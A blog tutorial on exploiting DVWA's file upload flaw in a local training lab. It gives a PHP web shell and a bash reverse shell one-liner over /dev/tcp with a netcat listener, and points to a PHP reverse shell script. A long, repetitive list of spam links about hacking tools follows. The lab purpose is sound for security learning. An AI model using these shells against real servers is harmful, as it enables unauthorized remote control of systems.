Learning Web Pentesting With DVWA Part 5: Using File Upload To Get Shell

In today's article we will go through the File Upload vulnerability of DVWA. File Upload vulnerability is a common vulnerability in which a web app doesn't restrict the type of files that can be uploaded to a server. The result of which is that a potential adversary uploads a malicious file to the server and finds his/her way to gain access to the server or perform other malicious activities. The consequences of Unrestricted File Upload are put out by OWASP as: "The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored."
For successful vulnerability exploitation, we need two things:
1. An unrestricted file upload functionality.
2. Access to the uploaded file to execute the malicious code.
To perform this type of attack on DVWA click on File Upload navigation link, you'll be presented with a file upload form like this:

Lets upload a simple text file to see what happens. I'll create a simple text file with the following command:

echo TESTUPLOAD > test.txt 

and now upload it.

The server gives a response back that our file was uploaded successfully and it also gives us the path where our file was stored on the server. Now lets try to access our uploaded file on the server, we go to the address provided by the server which is something like this:

http://localhost:9000/hackable/uploads/test.txt 

and we see the text we had written to the file. Lets upload a php file now since the server is using php. We will upload a simple php file containing phpinfo() function. The contents of the file should look something like this.

<?php phpinfo(); ?> 

Save the above code in a file called info.php (you can use any name) and upload it. Now naviagte to the provided URL:

http://localhost:9000/hackable/uploads/info.php 

and you should see a phpinfo page like this:

phpinfo page contains a lot of information about the web application, but what we are interested in right now in the page is the disable_functions column which gives us info about the disabled functions. We cannot use disabled functions in our php code. The function that we are interested in using is the system() function of php and luckily it is not present in the disable_functions column. So lets go ahead and write a simple php web shell:

<?php system($_GET["cmd"]); ?> 

save the above code in a file shell.php and upload it. Visit the uploaded file and you see nothing. Our simple php shell is looking for a "cmd" GET parameter which it passes then to the system() function which executes it. Lets check the user using the whoami command as follows:

http://localhost:9000/hackable/uploads/shell.php?cmd=whoami 

we see a response from the server giving us the user under which the web application is running.

We can use other bash commands such as ls to list the directories. Lets try to get a reverse shell now, we can use our existing webshell to get a reverse shell or we can upload a php reverse shell. Since we already have webshell at our disposal lets try this method first.

Lets get a one liner bash reverseshell from Pentest Monkey Reverse Shell Cheat Sheet and modify it to suit our setup, but we first need to know our ip address. Enter following command in a terminal to get your ip address:

ifconfig docker0 

the above command provides us information about our virtual docker0 network interface. After getting the ip information we will modify the bash one liner as:

bash -c 'bash -i >& /dev/tcp/172.17.0.1/9999 0>&1' 

here 172.17.0.1 is my docker0 interface ip and 9999 is the port on which I'll be listening for a reverse shell. Before entering it in our URL we need to urlencode it since it has some special characters in it. After urlencoding our reverse shell one liner online, it should look like this:

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27 

Now start a listener on host with this command:

nc -lvnp 9999 

and then enter the url encoded reverse shell in the cmd parameter of the url like this:

http://localhost:9000/hackable/uploads/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27 

looking back at the listener we have a reverse shell.

Now lets get a reverse shell by uploading a php reverse shell. We will use pentest monkey php reverse shell which you can get here. Edit the ip and port values of the php reverse shell to 172.17.0.1 and 9999. Setup our netcat listener like this:

nc -lvnp 9999 

and upload the reverse shell to the server and access it to execute our reverse shell.

That's it for today have fun.

References:

1. Unrestricted File Upload: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
2. Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
3. Php Reverse Shell (Pentest Monkey): https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Related news

1. Game Hacking
2. Hack Tools Mac
3. Hacker Tools Linux
4. Pentest Tools For Mac
5. Hacking Tools For Windows 7
6. Hacks And Tools
7. Beginner Hacker Tools
8. Hackers Toolbox
9. Hacking Tools Name
10. Hackrf Tools
11. Hacker Tools Apk Download
12. Black Hat Hacker Tools
13. Tools Used For Hacking
14. Pentest Tools Website Vulnerability
15. How To Hack
16. Hacker Tools Software
17. Hak5 Tools
18. Hacker Tools Free
19. Hacker Tools Software
20. Hack Website Online Tool
21. World No 1 Hacker Software
22. Hacking Tools Mac
23. Hacker Tools Free
24. Hacks And Tools
25. Hacker Tools Hardware
26. Hack Rom Tools
27. Hacker Techniques Tools And Incident Handling
28. Hacking Tools For Beginners
29. Pentest Tools Free
30. Best Hacking Tools 2019
31. Easy Hack Tools
32. Hacking Tools Windows
33. World No 1 Hacker Software
34. Pentest Tools Bluekeep
35. Hacker Search Tools
36. Usb Pentest Tools
37. Pentest Tools Bluekeep
38. Pentest Tools Review
39. Hacker Tools Apk
40. Easy Hack Tools
41. Best Hacking Tools 2020
42. Kik Hack Tools
43. Hacks And Tools
44. Hacking Tools Windows 10
45. World No 1 Hacker Software
46. Hack Tools For Games
47. Hacker Tools Software
48. Tools For Hacker
49. Pentest Tools Nmap
50. Hacking Tools Github
51. Hacker Tools 2020
52. Hacking Tools For Pc
53. Pentest Tools Open Source
54. Hacker Tools Hardware
55. Free Pentest Tools For Windows
56. Hack Tool Apk
57. Hacking Tools Mac
58. Hacking Apps
59. Hacking Tools And Software
60. Pentest Tools Port Scanner
61. Hack Apps
62. Termux Hacking Tools 2019
63. Hacking App
64. Hacking Tools Github
65. Tools 4 Hack
66. Pentest Tools Kali Linux
67. Pentest Recon Tools
68. Pentest Tools Bluekeep
69. Hacker Tools Free Download
70. Hacking Tools For Beginners
71. Pentest Tools Subdomain
72. New Hacker Tools
73. Pentest Tools Review
74. Hacking Tools 2019
75. Nsa Hack Tools Download
76. Hacking App
77. Hacker Tools For Mac
78. Pentest Tools Online
79. Hack And Tools
80. Top Pentest Tools
81. Pentest Recon Tools
82. Hack Apps
83. Black Hat Hacker Tools
84. New Hacker Tools
85. Hacker Tools Software
86. Pentest Tools For Android
87. Pentest Tools Download
88. Tools For Hacker
89. Pentest Tools Tcp Port Scanner
90. Ethical Hacker Tools
91. Hacker Tools Online
92. Hack Tools For Ubuntu
93. Hacking Tools For Windows
94. Tools 4 Hack
95. Hacker Tool Kit
96. Hacking Tools For Windows Free Download
97. Hacking Tools For Games
98. Pentest Tools Review
99. Hacker Tools Hardware
100. Hacking Tools For Windows 7
101. Hacking Tools Github
102. Hacker Tools Free
103. Hacking Tools For Games
104. Hacker Tools For Windows
105. Hacker Tool Kit
106. Pentest Tools For Mac
107. Hackrf Tools
108. Kik Hack Tools
109. Pentest Tools Free
110. Pentest Tools Review
111. Nsa Hacker Tools
112. Hacking Tools Github
113. Hak5 Tools
114. Hacker Tools Apk Download
115. Hacker Tools For Pc
116. Hacker Tools Free
117. Hack Tools For Mac
118. Hacker Tools Apk Download
119. Hacking Tools For Windows
120. Hacker Security Tools
121. Hacker Tools Free
122. Github Hacking Tools
123. Hacker Tools 2020
124. Hack Tools Mac
125. Pentest Tools Tcp Port Scanner
126. Hacker Tools For Mac
127. Best Hacking Tools 2019
128. Hacker Tools For Mac
129. Pentest Recon Tools
130. Pentest Automation Tools
131. Hack Apps
132. Pentest Tools Nmap
133. Hacking Tools Usb
134. Hacking App
135. Hack Tool Apk No Root
136. Hacker Tools Software
137. Nsa Hacker Tools
138. What Is Hacking Tools
139. Ethical Hacker Tools
140. Hacking Tools Github
141. Hacking Tools
142. Pentest Tools For Ubuntu
143. Pentest Tools Port Scanner
144. Underground Hacker Sites
145. Hack App
146. Pentest Tools Nmap
147. Pentest Tools Github
148. Hack App
149. Pentest Tools Website
150. Nsa Hack Tools Download
151. Pentest Tools Alternative
152. Pentest Box Tools Download
153. Hack Tool Apk
154. Pentest Tools Review
155. Hacker Tools Software
156. Hacker Security Tools
157. Pentest Reporting Tools
158. Hacker Tools Mac
159. Pentest Tools Github
160. Hacker Tools Software
161. Hacker Tools Online
162. Hacking Tools For Games
163. Hacker Tools Online
164. Hacking Tools Usb
165. Hacker Tools Linux
166. Hacker
167. Hacking Tools Online
168. Hacking Apps
169. Computer Hacker
170. Pentest Tools Windows
171. Hack Tools Mac
172. Hacking Tools For Windows 7
173. Ethical Hacker Tools
174. Tools Used For Hacking
175. Pentest Reporting Tools
176. Hacking Tools 2019
177. Tools Used For Hacking